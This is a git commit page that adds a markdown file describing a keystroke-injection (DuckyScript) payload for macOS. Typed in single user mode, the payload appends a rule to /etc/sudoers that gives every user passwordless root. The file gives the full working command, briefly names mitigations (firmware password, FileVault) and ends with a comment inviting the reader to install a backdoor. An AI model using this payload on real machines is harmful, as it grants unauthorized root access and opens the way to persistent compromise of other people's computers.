Created Payload - OSX Sudo for all users w/o password (markdown)
This commit is contained in:
parent
e8bf6c1ab8
commit
18ce50fc4f
|
@ -0,0 +1,21 @@
|
|||
**Author: Jesse Wallace (@c0deous)**
|
||||
**[c0deo.us](https://c0deo.us/)**
|
||||
|
||||
This script adds a line into /etc/sudoers that enables sudo for ALL users **without requiring a password.** Only requirement is a reboot into [single user mode](https://support.apple.com/en-us/HT201573).
|
||||
|
||||
**Mitigation**
|
||||
|
||||
Setup a [firmware password](https://support.apple.com/en-us/HT204455) or enable [FileVault](https://support.apple.com/en-us/HT204837) disk encryption.
|
||||
|
||||
```
|
||||
REM MacOS AllSudo
|
||||
REM Enables Sudo access for all users without a password
|
||||
REM First boot the machine into single user mode - https://support.apple.com/en-us/HT201573
|
||||
REM (You could probably script single user mode but I couldn't be bothered to play with the timings)
|
||||
REM By Jesse Wallace (@c0deous)
|
||||
REM https://c0deo.us/
|
||||
DELAY 1000
|
||||
STRING mount -uw / && chmod 755 /etc/sudoers && echo 'ALL ALL=(ALL) NOPASSWD: ALL' >> /etc/sudoers && chmod 440 /etc/sudoers && shutdown -h now
|
||||
ENTER
|
||||
REM Now would be a great time to install a backdoor. Ez root ;3
|
||||
REM TODO Use visudo for edits (unconfirmed if working)
|
Loading…
Reference in New Issue